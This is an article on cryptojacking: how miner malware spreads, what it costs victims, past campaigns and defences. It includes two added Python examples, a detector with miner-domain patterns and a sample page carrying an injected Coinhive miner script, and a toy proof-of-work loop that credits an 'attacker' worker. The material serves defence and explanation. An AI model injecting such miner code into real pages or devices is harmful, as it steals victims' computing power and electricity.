24. June 2021

Malware attack using crypto mining

If the performance of end devices suddenly drops for no apparent reason, a malware attack using crypto mining is one possible cause: virtual currencies are then being mined in the background without the user’s knowledge.
Cybercriminals often enrich themselves at the expense of the computing power of other people’s computers.

In security circles, crypto mining, or cryptojacking, has recently caused quite a stir. The term covers malware that taps into computing resources in the background, usually unnoticed by the user. “In a crypto-mining attack, program code is installed directly on a system without authorization or launched via an infected website,” says Candid Wüest, Principal Threat Researcher at Symantec, outlining the attackers’ approach. The goal is the covert mining of cryptocurrencies such as Bitcoin, Ethereum or Monero on other people’s computers. According to Wüest, the cybercriminals are primarily interested in mining virtual currencies for themselves and in obtaining the highest possible computing power at the lowest possible cost.

In principle, any computer or IoT device can become the target of such attacks. “However, attackers prefer to look for easy ways to use many computers for their unauthorized mining. A few lines of code, injected on an unprotected website, are enough to take over any visitor’s machine for hidden crypto mining,” Wüest reports. With several million incidents per month, such websites laced with mining scripts are currently the biggest problem; an in-browser miner runs only for as long as the page stays open, which is what makes heavily visited sites so attractive. The cybercriminals are not interested in attacking specific individuals, but in achieving a high return with as little effort as possible. Rolf Haas, Enterprise Technology Specialist at McAfee, sums up this approach as follows: “Cyber criminals enrich themselves at the expense of the computing power of other people’s computers.”

But how does an attack using crypto-mining malware actually proceed? In most cases, the infection of networks, computers or mobile devices takes place under the radar of those responsible. “Users are often tricked into downloading the malware by means of sometimes deceptively genuine fake emails or infected websites,” reports Georgeta Toth, Regional Director at security specialist Proofpoint. The victims are meant to click on prepared links, and as a rule the criminals use the same mechanisms as in phishing. Unpatched vulnerabilities in the operating system can also serve as a gateway for this type of malware.

And the danger lurks even in app stores. “A number of the apps on offer are equipped with crypto-mining code that then lets the devices mine in the background – the user then wonders why his battery is draining much faster than before,” adds Candid Wüest.

Power theft on a grand scale

According to Jochen Koehler, regional director at security provider Bromium, the consequences of such mining attacks range from a significant slowdown of devices and limited functionality to overheating batteries or the complete paralysis of computers.

It’s not uncommon for the damage to be severe for those affected. “Although resource theft initially goes completely unnoticed, the negative effects are felt by users in the long term. In any case, the victims are left with the – sometimes very high – electricity costs,” emphasizes Jochen Koehler. Candid Wüest confirms this, estimating that the electricity bills of large companies can rise by several thousand euros per month. Moreover, companies run the risk of coin miners bringing down their networks, or of incurring significant additional costs through the high utilization of their cloud resources.

Last but not least, Rolf Haas points to a further problem: the permanent load caused by computationally intensive crypto mining accelerates the wear of hardware components and can thus noticeably shorten the lifespan of computers.

Numerous prominent attacks

Attacks with crypto-mining malware have been increasing recently, with some prominent incidents making headlines. For example, IT security specialist McAfee recorded an increase of over 600 percent in coin-mining malware variants in Q1 2018 alone, which clearly shows the trend toward mining malware. “In China, for example, Android smartphones were attacked with a malware called ADB.Miner to mine the cryptocurrency Monero,” Rolf Haas reports. Other mining malware targets specific groups: one miner, for instance, was offered on a Russian forum as a supposed video game modification. Criminals also managed to turn Oracle WebLogic servers into a Monero-mining botnet by exploiting a vulnerability. On top of that, the websites of some major media companies unknowingly delivered crypto-mining scripts to their numerous visitors.

The most profitable so far, however, have been crypto-mining botnets such as WannaMine, which were distributed via spam emails and then spread on their own within the company network, Wüest believes. By his account, such botnets with a few thousand infected computers have already generated more than $100,000 in profits for the cybercriminals.

Georgeta Toth points to the Smominru malware, a miner for the cryptocurrency Monero which struck earlier this year. “It used the EternalBlue exploit and, uncharacteristically for crypto miners, propagated through the Windows management infrastructure.” Another negative example is Adylkuzz, which even outpaced the WannaCry ransomware in its spread, Toth adds.

Experts from security provider Eset came across a further incident in mid-September 2018: they discovered that third-party add-ons for the popular media player software Kodi were being misused for a malware campaign. According to a press release, a repository (XvBMC) that had recently been shut down for copyright infringement had been spreading cryptomining malware, probably unknowingly, since December 2017. Both Windows and Linux users of such add-ons should therefore scan their systems.

What protects against crypto mining?

In view of these numerous incidents, security managers should actively defend themselves against crypto mining. According to Georgeta Toth, anyone wanting to protect their own organization from the malware should first take the necessary technical precautions. Since most of these threats classically arrive by e-mail, the first task is to close that entry point. “In addition, employees should be sufficiently sensitized to the danger posed by crypto-mining, because humans themselves remain the greatest attack vector,” Toth adds in conclusion.

In this context, Candid Wüest advises always installing the latest patches and updates, so that cyber criminals cannot get into the system through known vulnerabilities. “Blocking scripts that are delivered via websites is another option. This is especially true for JavaScript attacks that take place in the browser,” Wüest continues. Furthermore, anti-cryptomining tools can be installed that specifically identify and prevent crypto-mining attacks; modern endpoint security solutions already have such protection integrated. The symptoms the article opens with are worth monitoring as well: sustained high CPU load on a host that should be idle, and outbound connections from unexpected processes to mining pools, are both signs that a miner has taken hold.
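The two footprints described above, the “few lines of code” injected into a website and an infected host talking to a mining pool, can both be picked up heuristically. The Python below is an added example and is not code from the article or from any of the vendors quoted in it; the script-source patterns, the pool port list, the sample page and the connection records are constructed assumptions modelled on the Coinhive/XMRig era, not a vendor signature feed.

```python
"""Heuristic detection of two cryptojacking footprints: a miner script
injected into a web page, and a host speaking stratum to a mining pool.
Added example code; sample inputs are constructed, indicator lists are assumptions."""
import json
import re

# Assumption: source patterns modelled on the Coinhive-style drop-in miners
# of 2017-2018; real blocklists are far longer and change constantly.
MINER_SRC_RE = re.compile(
    r"""<script[^>]*\ssrc=["']([^"']*"""
    r"""(?:coinhive|coin-hive|crypto-loot|cryptonight|webminer)[^"']*)["']""",
    re.IGNORECASE,
)
SCRIPT_BODY_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# A miner object constructed with a site/wallet key: the key is what gets the attacker paid.
MINER_INIT_RE = re.compile(r"""new\s+\w+\.(?:Anonymous|User)\(\s*["'][A-Za-z0-9_-]{16,}["']""")


def scan_html(html: str) -> list:
    """Return one finding per indicator seen in the page; an empty list means clean."""
    findings = []
    for m in MINER_SRC_RE.finditer(html):
        findings.append(f"miner-like external script: {m.group(1)}")
    for body in SCRIPT_BODY_RE.findall(html):
        if MINER_INIT_RE.search(body):
            findings.append("inline miner initialised with a site key")
    return findings


# Bitcoin-style stratum and XMRig/Monero-style JSON-RPC method names.
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                   "mining.notify", "login", "submit", "job"}
# Assumption: ports pools commonly listen on; a weak signal on its own.
POOL_PORTS = {3333, 4444, 5555, 7777, 8888, 14444}


def parse_stratum(payload: str):
    """Return (method, worker_or_login) if the payload is a stratum message, else None."""
    try:
        msg = json.loads(payload)
    except (TypeError, ValueError):
        return None
    if not isinstance(msg, dict) or msg.get("method") not in STRATUM_METHODS:
        return None
    params = msg.get("params")
    if isinstance(params, dict):               # XMRig-style: {"login": wallet, "agent": ...}
        worker = params.get("login") or params.get("agent")
    elif isinstance(params, list) and params:  # stratum: [worker_or_agent, ...]
        worker = params[0]
    else:
        worker = None
    return msg["method"], worker


def find_miners(records: list, threshold: int = 3) -> list:
    """Score each {proc, cpu, dst, payload} record; a stratum hit alone is decisive,
    a pool-style port or sustained CPU only adds weight. Returns (proc, score, reasons)."""
    hits = []
    for rec in records:
        score, reasons = 0, []
        hit = parse_stratum(rec.get("payload", ""))
        if hit:
            score += 3
            reasons.append(f"stratum {hit[0]} as {hit[1]!r}")
        port = int(rec["dst"].rsplit(":", 1)[1])
        if port in POOL_PORTS:
            score += 1
            reasons.append(f"pool-style port {port}")
        if rec.get("cpu", 0) >= 80:
            score += 1
            reasons.append(f"sustained CPU {rec['cpu']}%")
        if score >= threshold:
            hits.append((rec["proc"], score, reasons))
    return hits


# Constructed samples (not real captures).
SAMPLE_HTML = """<html><body>
<script src="https://cdn.example.com/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('Ab12Cd34Ef56Gh78Ij90', {throttle: 0.3});
  miner.start();
</script>
</body></html>"""

SAMPLE_RECORDS = [
    {"proc": "chrome.exe", "cpu": 4.0, "dst": "203.0.113.10:443", "payload": ""},
    {"proc": "svchost.exe", "cpu": 97.0, "dst": "198.51.100.7:14444",
     "payload": '{"id":1,"jsonrpc":"2.0","method":"login","params":'
                '{"login":"4AexampleMoneroWalletAddress","pass":"x","agent":"XMRig/5.11.1"}}'},
    {"proc": "backup.exe", "cpu": 85.0, "dst": "192.0.2.5:443", "payload": ""},  # busy but legitimate
]

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print("page:", finding)
    for proc, score, why in find_miners(SAMPLE_RECORDS):
        print(f"host: {proc} score={score}: {'; '.join(why)}")
```

The scoring deliberately treats a parsed stratum handshake as sufficient on its own, while high CPU or a pool-style port merely add weight: the busy backup process in the sample stays below the threshold, which is the false positive a CPU-only rule would raise.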

How does crypto-mining malware work?

  1. Crypto mining refers to the “mining” of cryptocurrencies such as Bitcoin or Ethereum, which a computer performs by carrying out certain computationally intensive operations.
  2. Cryptocurrencies are thus generated from computing power. Crypto-mining malware secretly performs this process on an infected computer and sends the cryptocurrency obtained back to the originator of the attack.
  3. Cybercriminals thus enrich themselves at the expense of the computing power of other people’s computers.
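To make concrete what the “computing power” in the three points above is spent on: a miner repeats a hash-and-compare loop until it finds a nonce whose hash falls below a target, then reports that share to a pool under the worker name, and therefore the wallet, of whoever configured it. The Python below is an added example, not the article’s; it is a simplified Bitcoin-style double-SHA-256 model with a constructed header and toy difficulty, not any real coin’s consensus rules, and the submit message mirrors the stratum mining.submit shape with constructed values.

```python
"""A minimal proof-of-work loop: the operation a coin miner repeats millions
of times per second. Added example, not from the article; simplified
Bitcoin-style double SHA-256 with a constructed header and toy difficulty."""
import hashlib
import json
import struct
import time


def pow_hash(header: bytes, nonce: int) -> bytes:
    """Double SHA-256 over header || nonce (nonce as little-endian 32-bit, as in Bitcoin)."""
    data = header + struct.pack("<I", nonce)
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def meets_target(digest: bytes, difficulty_bits: int) -> bool:
    """True when the hash, read as a big-endian integer, has at least
    difficulty_bits leading zero bits, i.e. is below 2**(256 - bits)."""
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))


def mine(header: bytes, difficulty_bits: int, max_nonce: int = 1 << 32):
    """Try nonces in order until one meets the target.
    Returns (nonce, hashes_tried), or (None, max_nonce) if the range is exhausted."""
    for nonce in range(max_nonce):
        if meets_target(pow_hash(header, nonce), difficulty_bits):
            return nonce, nonce + 1
    return None, max_nonce


def expected_hashes(difficulty_bits: int) -> int:
    """Mean attempts needed: each hash succeeds with probability 2**-bits,
    so doubling the difficulty bits by one doubles the work (and the power bill)."""
    return 1 << difficulty_bits


def submit_share(worker: str, job_id: str, nonce: int, msg_id: int = 4) -> str:
    """The stratum mining.submit message a miner sends to its pool (constructed values).
    The pool credits the worker name, which is why a hijacked miner pays the attacker:
    the victim's CPU finds the share, the attacker's account receives the reward."""
    return json.dumps({"id": msg_id, "method": "mining.submit",
                       "params": [worker, job_id, f"{nonce:08x}"]})


if __name__ == "__main__":
    header = b"constructed-block-header" + bytes(40)   # placeholder header, not a real block
    for bits in (8, 12, 16):
        t0 = time.perf_counter()
        nonce, tried = mine(header, bits)
        rate = tried / max(time.perf_counter() - t0, 1e-9)
        print(f"bits={bits:2d} nonce={nonce:8d} hashes={tried:7d} "
              f"expected~{expected_hashes(bits):6d} {rate:,.0f} H/s")
    print(submit_share("attacker.worker01", "job-1", nonce))
```

Running it shows the attempt count tracking 2^bits while the hash rate stays flat: the loop is pure CPU work with no useful output for the machine doing it, which is the whole economics of the attack in the three points above.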